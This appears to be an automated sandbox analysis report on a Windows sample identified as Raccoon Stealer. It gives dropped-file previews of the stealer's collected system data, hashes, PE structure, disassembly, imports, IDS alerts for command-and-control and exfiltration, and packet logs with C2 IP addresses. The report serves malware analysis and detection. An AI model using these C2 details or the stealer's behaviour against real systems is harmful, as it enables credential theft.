C:\Users\user\AppData\LocalLow\yH9tY9hO9gL5 Download File
Process:	C:\Users\user\Desktop\8aAG42oIjb.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	5.3041905744732585
Encrypted:	false
SSDEEP:	24:m9S+2pH/l3eqy53Net5IVWLdBqhKQa7gCGik/R8RAuLTvqzh:eSh93e3NetFRBgpCGik/R0As0h
MD5:	FE50D2C5D100A447ABF8CB6A80263CE1
SHA1:	B8C7C664E251E48BD468714D68E913A307F19E39
SHA-256:	00E55B1953A0B2B2A4DA1D9011F8781BC96B97B7881D96EEED34EEC2791D2B4D
SHA-512:	0A3B46987DEBACE0D89B0E6320D4AA247552ACFB0D64FF991C4E227A058F9EE37CB57A9EBB283F860E47444BE55508751B216F07B4A0BC4E92BDB5511EB4913A
Malicious:	false
Preview:	RACCOON STEALER \| 1.8.1...Build compile date: Wed Sep 8 00:01:38 2021...Launched at: 2021.09.28 - 06:27:19 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: +1 hrs... - IP: 84.17.52.39... - Location: 47.431702, 8.575900 \| Zurich, Zurich, Switzerland (8152)... - ComputerName: 849224... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5434 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Adobe Refresh Manager (1.8.0)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java A

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.68245095187763
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	8aAG42oIjb.exe
File size:	474112
MD5:	613617e5b41e1031a2d72e07afca8c29
SHA1:	a1aaa2b0313898160c5c26b162a17179d4b164bc
SHA256:	889e9ef0fbe47480ebf02cfaa6d9f0516e134f6bcf63783ee5ea135471e147c2
SHA512:	f56499a1d01563b120b1d44a5589955abcaeffeba1038cd5599043c679fc77b427fdb78f92ce31af13d926b074e4aa031de8433513121698d0a96ce7299bb80e
SSDEEP:	12288:VPr9y5EGqZgz/EHFT2mch8QaVtwjMhBp+I9ABqe:VPI5QZgz/+DE8QEtUMII9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................PE..L..

File Icon


Icon Hash:	e0e4e8beb0e4c8ea

Static PE Info

General
Entrypoint:	0x401b18
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x60158A5B [Sat Jan 30 16:33:31 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	006a79ea8a61231651632116bf97f2d7

Entrypoint Preview

Instruction
call 00007F3F7109CA10h
jmp 00007F3F71099E1Dh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [0045D008h+ecx*8]
je 00007F3F71099FB5h
inc ecx
cmp ecx, 2Dh
jc 00007F3F71099F93h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F3F71099FB0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [0045D00Ch+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F3F7109C675h
test eax, eax
jne 00007F3F71099FA8h
mov eax, 0045D170h
ret
add eax, 08h
ret
call 00007F3F7109C662h
test eax, eax
jne 00007F3F71099FA8h
mov eax, 0045D174h
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F3F71099F87h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F3F71099F27h
pop ecx
mov esi, eax
call 00007F3F71099F61h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
push 0000000Ch
push 0045B5D8h
call 00007F3F7109AD2Ch
mov ecx, dword ptr [ebp+08h]
xor edi, edi
cmp ecx, edi
jbe 00007F3F71099FD0h
push FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, dword ptr [ebp+0Ch]
sbb eax, eax
inc eax
jne 00007F3F71099FC1h
call 00007F3F71099F33h
mov dword ptr [eax], 0000000Ch
push edi
push edi
push edi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5c1a0	0x51	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x5b92c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe3000	0x175b8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x591c0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5a480	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x59000	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x57140	0x57200	False	0.964000291428	data	7.9738824165	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x59000	0x31f1	0x3200	False	0.258828125	data	4.21903305083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5d000	0x8557c	0x1e00	False	0.118229166667	data	1.32279264512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xe3000	0x175b8	0x17600	False	0.686497326203	data	6.35656756972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xe3720	0xea8	data	English	United States
RT_ICON	0xe45c8	0x8a8	data	English	United States
RT_ICON	0xe4e70	0x6c8	data	English	United States
RT_ICON	0xe5538	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe5aa0	0x25a8	data	English	United States
RT_ICON	0xe8048	0x10a8	data	English	United States
RT_ICON	0xe90f0	0x988	data	English	United States
RT_ICON	0xe9a78	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe9f58	0x6c8	data	English	United States
RT_ICON	0xea620	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xeab88	0x25a8	data	English	United States
RT_ICON	0xed130	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xed5d8	0xea8	data	English	United States
RT_ICON	0xee480	0x8a8	data	English	United States
RT_ICON	0xeed28	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xef290	0x25a8	data	English	United States
RT_ICON	0xf1838	0x10a8	data	English	United States
RT_ICON	0xf28e0	0x988	data	English	United States
RT_ICON	0xf3268	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xf3738	0xea8	data	English	United States
RT_ICON	0xf45e0	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 12959954, next used block 8421247	English	United States
RT_ICON	0xf4e88	0x6c8	data	English	United States
RT_ICON	0xf5550	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xf5ab8	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0xf8060	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 618835408, next used block 669097167	English	United States
RT_ICON	0xf9108	0x988	data	English	United States
RT_ICON	0xf9a90	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_STRING	0xfa190	0x424	data
RT_ACCELERATOR	0xf9f70	0x50	data
RT_ACCELERATOR	0xf9fc0	0x20	data
RT_GROUP_ICON	0xed598	0x3e	data	English	United States
RT_GROUP_ICON	0xe9ee0	0x76	data	English	United States
RT_GROUP_ICON	0xf9ef8	0x76	data	English	United States
RT_GROUP_ICON	0xf36d0	0x68	data	English	United States
RT_VERSION	0xf9fe0	0x1b0	data

Imports

DLL

Import

KERNEL32.dll

GetCommandLineW, HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedDecrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, FindNextVolumeW, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetCommandLineA, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA

USER32.dll

GetCursorPos

Exports

Name	Ordinal	Address
@SetViceVariants@12	1	0x401000

Version Infos

Description	Data
InternalName	sajbmiamezu.ise
ProductVersion	8.64.59.5
Copyright	Copyrighz (C) 2021, fudkagat
Translation	0x0127 0x0081

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-07:14:05.414235	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49751	80	192.168.2.4	185.138.164.150
09/28/21-07:14:07.903349	TCP	2033973	ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)	49751	80	192.168.2.4	185.138.164.150
09/28/21-07:14:10.130857	TCP	2033974	ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt	49751	80	192.168.2.4	185.138.164.150

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 07:14:04.579799891 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.579854012 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.579952002 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.582885027 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.582912922 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.645371914 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.645530939 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.647785902 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.647802114 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.648045063 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.690840960 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.874000072 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.915610075 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.915663958 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.915682077 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.915848017 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.915879965 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.915996075 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.916117907 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.917855978 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.917892933 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.917927980 CEST	49750	443	192.168.2.4	149.154.167.99
Sep 28, 2021 07:14:04.917942047 CEST	443	49750	149.154.167.99	192.168.2.4
Sep 28, 2021 07:14:04.926513910 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:04.962492943 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:04.962626934 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:04.963080883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:04.963149071 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:04.998545885 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:04.998567104 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.354696989 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.354748011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.354810953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.354837894 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.354844093 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.354888916 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.397536993 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.397564888 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.397572994 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.397768021 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.414235115 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.451792955 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683645010 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683682919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683696032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683705091 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683775902 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683794022 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683809042 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683823109 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683825970 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.683862925 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.683866978 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.683917046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683936119 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.683983088 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719176054 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719211102 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719227076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719242096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719260931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719264030 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719279051 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719290972 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719295979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719311953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719324112 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719326973 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719341993 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719357014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719357967 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719372988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719374895 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719392061 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719408989 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719423056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719423056 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719438076 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719444990 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.719451904 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.719475985 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.721554041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.721573114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.721589088 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.721609116 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.721637011 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759257078 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759282112 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759296894 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759315968 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759358883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759390116 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759475946 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759505033 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759540081 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759546995 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759556055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759572983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759588003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759597063 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759614944 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759638071 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759648085 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759692907 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759697914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759715080 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759748936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759756088 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759766102 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759780884 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759805918 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759826899 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759843111 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759857893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759872913 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759881973 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759888887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759907961 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759927034 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.759938955 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759954929 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759970903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.759996891 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760011911 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760015011 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760025978 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760044098 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760056019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760071993 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760072947 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760087967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760107994 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760123014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760134935 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760135889 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760147095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760162115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760162115 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760185003 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760185003 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760198116 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760209084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760225058 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.760241032 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760268927 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.760298014 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.794816971 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794848919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794866085 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794881105 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794897079 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794898987 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.794914007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794925928 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.794929028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794945002 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.794961929 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.794982910 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.794997931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795017004 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795063019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795064926 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795079947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795140028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795171022 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795186996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795203924 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795218945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795233965 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795233965 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795249939 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795250893 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795286894 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795346022 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795366049 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795381069 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795399904 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795408964 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795417070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795433044 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795443058 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795449018 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795475960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:05.795480013 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:05.795490980 CEST	80	49751	185.138.164.150	192.168.2.4
